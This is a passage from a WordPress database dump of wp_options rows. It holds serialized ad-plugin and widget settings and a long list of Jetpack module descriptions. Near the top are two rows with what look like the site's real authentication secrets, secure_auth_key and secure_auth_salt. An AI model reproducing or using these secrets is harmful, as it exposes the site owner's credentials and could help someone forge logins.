5:\"1.5.4\";i:1431678108;s:10:\"nl_adsense\";i:1432149987;s:3:\"1.6\";i:1434985379;}}','yes'),(2947,'widget_advads_ad_widget','a:3:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:7:\"item_id\";s:6:\"ad_172\";}i:3;a:2:{s:5:\"title\";s:0:\"\";s:7:\"item_id\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(2949,'advads-ads-placements','a:1:{s:23:\"ca-pub-4101373333307108\";a:2:{s:4:\"type\";s:7:\"default\";s:4:\"name\";s:7:\"OlliTal\";}}','yes'),(2979,'advanced_ads_groups_children','a:0:{}','yes'),(2983,'advads-ad-weights','a:1:{i:18;a:1:{i:172;i:10;}}','yes'),(2984,'advanced-ads','a:5:{s:12:\"disabled-ads\";a:2:{i:404;s:1:\"1\";s:8:\"archives\";s:1:\"1\";}s:18:\"hide-for-user-role\";s:0:\"\";s:26:\"content-injection-priority\";s:3:\"100\";s:10:\"block-bots\";s:1:\"1\";s:15:\"disable-notices\";s:1:\"1\";}','yes'),(2987,'advanced-ads-licenses','','yes'),(2997,'maa_settings','a:22:{s:24:\"enable_basic_ad_settings\";s:1:\"1\";s:10:\"basic_mode\";s:8:\"standard\";s:33:\"user_how_many_adsense_ads_allowed\";s:1:\"2\";s:41:\"user_how_many_adsense_ads_display_allowed\";s:1:\"3\";s:23:\"ad_supression_abilities\";s:5:\"admin\";s:12:\"ad_alignment\";s:5:\"right\";s:8:\"pro_demo\";s:1:\"1\";s:29:\"user_how_many_auto_insert_ads\";s:1:\"1\";s:15:\"revenue_sharing\";s:1:\"0\";s:8:\"admin_id\";s:1:\"1\";s:21:\"author_filtering_type\";s:8:\"fallback\";s:25:\"show_ads_after_x_articles\";s:1:\"0\";s:27:\"show_ads_if_post_is_x_words\";s:1:\"0\";s:37:\"user_how_many_non_adsense_ads_allowed\";s:1:\"1\";s:12:\"adsense_only\";s:4:\"both\";s:17:\"hide_ads_on_users\";s:0:\"\";s:20:\"category_filter_mode\";s:4:\"show\";s:17:\"ads_on_categories\";s:0:\"\";s:15:\"tag_filter_mode\";s:4:\"show\";s:11:\"ads_on_tags\";s:0:\"\";s:18:\"enabled_post_types\";s:4:\"post\";s:21:\"show_ads_to_logged_in\";s:1:\"1\";}','yes'),(3915,'widget_tag_cloud','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:8:\"taxonomy\";s:8:\"post_tag\";}s:12:\"_multiwidget\";i:1;}','yes'),(4380,'secure_auth_key','+4EC,7pn$o*tJ(i6dyF1?$oi]O;x71/JKnr9@a;Px(f%A*|t2M6.ffgyP&Af6iua','yes'),(4381,'secure_auth_salt','eLCO{o@WjsXg_CtaM>:3A{$*NTLrbwYO$GF#,X-2$L67za2D`OFib#N7!4e%5*@[','yes'),(4507,'smooth_db_version','2.8.2','yes'),(6709,'jetpack_file_data','a:1:{s:5:\"3.8.1\";a:48:{s:32:\"31e5b9ae08b62c2b0cd8a7792242298b\";a:14:{s:4:\"name\";s:20:\"Spelling and Grammar\";s:11:\"description\";s:89:\"Check your spelling, style, and grammar with the After the Deadline proofreading service.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"6\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:115:\"after the deadline, afterthedeadline, spell, spellchecker, spelling, grammar, proofreading, style, language, cliche\";}s:32:\"3f41b2d629265b5de8108b463abbe8e2\";a:14:{s:4:\"name\";s:8:\"Carousel\";s:11:\"description\";s:63:\"Transform standard image galleries into full-screen slideshows.\";s:14:\"jumpstart_desc\";s:79:\"Brings your photos and images to life as full-size, easily navigable galleries.\";s:4:\"sort\";s:2:\"22\";s:20:\"recommendation_order\";s:2:\"12\";s:10:\"introduced\";s:3:\"1.5\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:17:\"Photos and Videos\";s:7:\"feature\";s:9:\"Jumpstart\";s:25:\"additional_search_queries\";s:80:\"gallery, carousel, diaporama, slideshow, images, lightbox, exif, metadata, image\";}s:32:\"c6ebb418dde302de09600a6025370583\";a:14:{s:4:\"name\";s:8:\"Comments\";s:11:\"description\";s:79:\"Let readers comment with WordPress.com, Twitter, Facebook, or Google+ accounts.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"20\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:53:\"comments, comment, facebook, twitter, google+, social\";}s:32:\"836f9485669e1bbb02920cb474730df0\";a:14:{s:4:\"name\";s:12:\"Contact Form\";s:11:\"description\";s:44:\"Insert a contact form anywhere on your site.\";s:14:\"jumpstart_desc\";s:111:\"Adds a button to your post and page editors, allowing you to build simple forms to help visitors stay in touch.\";s:4:\"sort\";s:2:\"15\";s:20:\"recommendation_order\";s:2:\"14\";s:10:\"introduced\";s:3:\"1.3\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:5:\"Other\";s:7:\"feature\";s:9:\"Jumpstart\";s:25:\"additional_search_queries\";s:44:\"contact, form, grunion, feedback, submission\";}s:32:\"ea3970eebf8aac55fc3eca5dca0e0157\";a:14:{s:4:\"name\";s:20:\"Custom Content Types\";s:11:\"description\";s:92:\"Organize and display different types of content on your site, separate from posts and pages.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"34\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"3.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:72:\"cpt, custom post types, portfolio, portfolios, testimonial, testimonials\";}s:32:\"d2bb05ccad3d8789df40ca3abb97336c\";a:14:{s:4:\"name\";s:10:\"Custom CSS\";s:11:\"description\";s:57:\"Customize your site’s CSS without modifying your theme.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"2\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.7\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:10:\"Appearance\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:108:\"css, customize, custom, style, editor, less, sass, preprocessor, font, mobile, appearance, theme, stylesheet\";}s:32:\"a2064eec5b9c7e0d816af71dee7a715f\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"53a4ec755022ef3953699734c343da02\";a:14:{s:4:\"name\";s:21:\"Enhanced Distribution\";s:11:\"description\";s:27:\"Increase reach and traffic.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"5\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:6:\"Public\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Traffic\";s:25:\"additional_search_queries\";s:54:\"google, seo, firehose, search, broadcast, broadcasting\";}s:32:\"72fecb67ee6704ba0a33e0225316ad06\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"d56e2886185a9eace719cc57d46770df\";a:14:{s:4:\"name\";s:19:\"Gravatar Hovercards\";s:11:\"description\";s:58:\"Enable pop-up business cards over commenters’ Gravatars.\";s:14:\"jumpstart_desc\";s:131:\"Let commenters link their profiles to their Gravatar accounts, making it easy for your visitors to learn more about your community.\";s:4:\"sort\";s:2:\"11\";s:20:\"recommendation_order\";s:2:\"13\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:18:\"Social, Appearance\";s:7:\"feature\";s:9:\"Jumpstart\";s:25:\"additional_search_queries\";s:20:\"gravatar, hovercards\";}s:32:\"e391e760617bd0e0736550e34a73d7fe\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:8:\"2.0.3 ??\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"2e345370766346c616b3c5046e817720\";a:14:{s:4:\"name\";s:15:\"Infinite Scroll\";s:11:\"description\";s:46:\"Add support for infinite scroll to your theme.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"26\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:10:\"Appearance\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:33:\"scroll, infinite, infinite scroll\";}s:32:\"bd69edbf134de5fae8fdcf2e70a45b56\";a:14:{s:4:\"name\";s:8:\"JSON API\";s:11:\"description\";s:69:\"Allow applications to securely access your content through the cloud.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"19\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:6:\"Public\";s:11:\"module_tags\";s:19:\"Writing, Developers\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:50:\"api, rest, develop, developers, json, klout, oauth\";}s:32:\"8110b7a4423aaa619dfa46b8843e10d1\";a:14:{s:4:\"name\";s:14:\"Beautiful Math\";s:11:\"description\";s:85:\"Use LaTeX markup language in posts and pages for complex equations and other geekery.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"12\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:47:\"latex, math, equation, equations, formula, code\";}s:32:\"fd7e85d3b4887fa6b6f997d6592c1f33\";a:14:{s:4:\"name\";s:5:\"Likes\";s:11:\"description\";s:70:\"Give visitors an easy way to show their appreciation for your content.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"23\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:26:\"like, likes, wordpress.com\";}s:32:\"c5dfef41fad5bcdcaae8e315e5cfc420\";a:14:{s:4:\"name\";s:6:\"Manage\";s:11:\"description\";s:76:\"Manage all your sites from a centralized place, https://wordpress.com/sites.\";s:14:\"jumpstart_desc\";s:151:\"Helps you remotely manage plugins, turn on automated updates, and more from wordpress.com.\";s:4:\"sort\";s:1:\"1\";s:20:\"recommendation_order\";s:1:\"3\";s:10:\"introduced\";s:3:\"3.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:35:\"Centralized Management, Recommended\";s:7:\"feature\";s:22:\"Recommended, Jumpstart\";s:25:\"additional_search_queries\";s:26:\"manage, management, remote\";}s:32:\"fd6dc399b92bce76013427e3107c314f\";a:14:{s:4:\"name\";s:8:\"Markdown\";s:11:\"description\";s:51:\"Write posts or pages in plain-text Markdown syntax.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"31\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.8\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:12:\"md, markdown\";}s:32:\"c49a35b6482b0426cb07ad28ecf5d7df\";a:14:{s:4:\"name\";s:12:\"Mobile Theme\";s:11:\"description\";s:64:\"Optimize your site with a mobile-friendly theme for smartphones.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"21\";s:20:\"recommendation_order\";s:2:\"11\";s:10:\"introduced\";s:3:\"1.8\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:31:\"Appearance, Mobile, Recommended\";s:7:\"feature\";s:11:\"Recommended\";s:25:\"additional_search_queries\";s:24:\"mobile, theme, minileven\";}s:32:\"b42e38f6fafd2e4104ebe5bf39b4be47\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"771cfeeba0d3d23ec344d5e781fb0ae2\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"54f0661d27c814fc8bde39580181d939\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"46c4c413b5c72bbd3c3dbd14ff8f8adc\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"9ea52fa25783e5ceeb6bfaed3268e64e\";a:14:{s:4:\"name\";s:7:\"Monitor\";s:11:\"description\";s:25:\"Reports on site downtime.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"28\";s:20:\"recommendation_order\";s:2:\"10\";s:10:\"introduced\";s:3:\"2.6\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:11:\"Recommended\";s:7:\"feature\";s:33:\"Recommended, Performance-Security\";s:25:\"additional_search_queries\";s:37:\"monitor, uptime, downtime, monitoring\";}s:32:\"cfcaafd0fcad087899d715e0b877474d\";a:14:{s:4:\"name\";s:13:\"Notifications\";s:11:\"description\";s:84:\"Receive notification of site activity via the admin toolbar and your Mobile devices.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"13\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:5:\"Other\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:62:\"notification, notifications, toolbar, adminbar, push, comments\";}s:32:\"0d18bfa69bec61550c1d813ce64149b0\";a:14:{s:4:\"name\";s:10:\"Omnisearch\";s:11:\"description\";s:66:\"Search your entire database from a single field in your Dashboard.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"16\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.3\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:10:\"Developers\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:6:\"search\";}s:32:\"3f0a11e23118f0788d424b646a6d465f\";a:14:{s:4:\"name\";s:6:\"Photon\";s:11:\"description\";s:27:\"Speed up images and photos.\";s:14:\"jumpstart_desc\";s:141:\"Mirrors and serves your images from our free and fast image CDN, improving your site’s performance with no additional load on your servers.\";s:4:\"sort\";s:2:\"25\";s:20:\"recommendation_order\";s:1:\"1\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:42:\"Photos and Videos, Appearance, Recommended\";s:7:\"feature\";s:44:\"Recommended, Jumpstart, Performance-Security\";s:25:\"additional_search_queries\";s:38:\"photon, image, cdn, performance, speed\";}s:32:\"e37cfbcb72323fb1fe8255a2edb4d738\";a:14:{s:4:\"name\";s:13:\"Post by Email\";s:11:\"description\";s:58:\"Publish posts by email, using any device and email client.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"14\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:20:\"post by email, email\";}s:32:\"728290d131a480bfe7b9e405d7cd925f\";a:14:{s:4:\"name\";s:7:\"Protect\";s:11:\"description\";s:28:\"Prevent brute force attacks.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"1\";s:20:\"recommendation_order\";s:1:\"4\";s:10:\"introduced\";s:3:\"3.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:11:\"Recommended\";s:7:\"feature\";s:33:\"Recommended, Performance-Security\";s:25:\"additional_search_queries\";s:65:\"security, secure, protection, botnet, brute force, protect, login\";}s:32:\"f9ce784babbbf4dcca99b8cd2ceb420c\";a:14:{s:4:\"name\";s:9:\"Publicize\";s:11:\"description\";s:30:\"Automatically promote content.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"10\";s:20:\"recommendation_order\";s:1:\"7\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:19:\"Social, Recommended\";s:7:\"feature\";s:20:\"Recommended, Traffic\";s:25:\"additional_search_queries\";s:107:\"facebook, twitter, google+, googleplus, google, path, tumblr, linkedin, social, tweet, connections, sharing\";}s:32:\"052c03877dd3d296a71531cb07ad939a\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"52edecb2a75222e75b2dce4356a4efce\";a:14:{s:4:\"name\";s:13:\"Related Posts\";s:11:\"description\";s:24:\"Display similar content.\";s:14:\"jumpstart_desc\";s:113:\"Keep visitors engaged on your blog by highlighting relevant and new content at the bottom of each published post.\";s:4:\"sort\";s:2:\"29\";s:20:\"recommendation_order\";s:1:\"9\";s:10:\"introduced\";s:3:\"2.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:11:\"Recommended\";s:7:\"feature\";s:31:\"Recommended, Jumpstart, Traffic\";s:25:\"additional_search_queries\";s:22:\"related, related posts\";}s:32:\"8b059cb50a66b717f1ec842e736b858c\";a:14:{s:4:\"name\";s:7:\"Sharing\";s:11:\"description\";s:32:\"Visitors can share your content.\";s:14:\"jumpstart_desc\";s:116:\"Twitter, Facebook and Google+ buttons at the bottom of each post, making it easy for visitors to share your content.\";s:4:\"sort\";s:1:\"7\";s:20:\"recommendation_order\";s:1:\"6\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:3:\"1.2\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:19:\"Social, Recommended\";s:7:\"feature\";s:31:\"Recommended, Jumpstart, Traffic\";s:25:\"additional_search_queries\";s:141:\"share, sharing, sharedaddy, buttons, icons, email, facebook, twitter, google+, linkedin, pinterest, pocket, press this, print, reddit, tumblr\";}s:32:\"a6d2394329871857401255533a9873f7\";a:14:{s:4:\"name\";s:16:\"Shortcode Embeds\";s:11:\"description\";s:77:\"Embed content from YouTube, Vimeo, SlideShare, and more, no coding necessary.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"3\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:3:\"1.2\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:46:\"Photos and Videos, Social, Writing, Appearance\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:251:\"shortcodes, shortcode, embeds, media, bandcamp, blip.tv, dailymotion, digg, facebook, flickr, google calendars, google maps, google+, polldaddy, recipe, recipes, scribd, slideshare, slideshow, slideshows, soundcloud, ted, twitter, vimeo, vine, youtube\";}s:32:\"21496e2897ea5f81605e2f2ac3beb921\";a:14:{s:4:\"name\";s:16:\"WP.me Shortlinks\";s:11:\"description\";s:56:\"Enable WP.me-powered shortlinks for all posts and pages.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"8\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:17:\"shortlinks, wp.me\";}s:32:\"e2a54a5d7879a4162709e6ffb540dd08\";a:14:{s:4:\"name\";s:9:\"Site Icon\";s:11:\"description\";s:29:\"Add a site icon to your site.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"22\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"3.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:5:\"Other\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:24:\"favicon, icon, site icon\";}s:32:\"59a23643437358a9b557f1d1e20ab040\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"6a90f97c3194cfca5671728eaaeaf15e\";a:14:{s:4:\"name\";s:14:\"Single Sign On\";s:11:\"description\";s:27:\"Secure user authentication.\";s:14:\"jumpstart_desc\";s:98:\"Lets you log in to all your Jetpack-enabled sites with one click using your WordPress.com account.\";s:4:\"sort\";s:2:\"30\";s:20:\"recommendation_order\";s:1:\"5\";s:10:\"introduced\";s:3:\"2.6\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:10:\"Developers\";s:7:\"feature\";s:31:\"Jumpstart, 